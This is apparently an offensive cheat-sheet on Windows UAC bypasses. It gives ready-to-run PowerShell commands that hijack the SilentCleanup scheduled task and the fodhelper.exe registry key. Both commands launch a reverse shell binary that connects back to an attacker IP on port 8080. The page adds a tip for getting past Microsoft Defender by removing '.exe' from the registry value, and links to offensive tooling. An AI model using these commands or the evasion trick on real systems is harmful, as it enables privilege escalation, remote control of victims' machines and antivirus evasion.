User Access Control (UAC)

User Account control (UAC)

Exploring Windows UAC Bypasses: Techniques and Detection Strategies — Elastic Security Labs

Bypass 1: DiskCleanup Scheduled Task Hijack

Exploiting Environment Variables in Scheduled Tasks for UAC Bypass

SilentCleanup is a scheduled task which is configured on Windows by default. It may be started from a process with a medium integrity level, and then automatically elevates to a high integrity level since the "Run with highest privileges" option is enabled.

It starts the program "%windir%\system32\cleanmgr.exe" with some arguments.

Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd.exe /K C:\Windows\Tasks\RShell.exe <IP> 8080 & REM " -Force
Start-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup" -TaskName "SilentCleanup"

Cleanup

Clear-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Force

Bypass 2: FodHelper Execution Hijack

Windows10: Neue UAC-Bypassing-Methode (fodhelper.exe)Borns IT- und Windows-Blog

The difference between signature-based and behavioural detections | S3cur3Th1sSh1t

Microsoft Defender Antivirus is only triggered when it senses ".exe" in the value being set, so if you simply remove the ".exe" you will not get blocked. RShell.exe => RShell

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Windows\Tasks\RShell <IP> 8080" -Force

C:\Windows\System32\fodhelper.exe

Cleanup

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

SSPI Datagram Contexts

GitHub - antonioCoco/SspiUacBypass: Bypassing UAC with SSPI Datagram ContextsGitHub

WinPwnage

GitHub - rootm0s/WinPwnage: UAC bypass, Elevate, Persistence methodsGitHub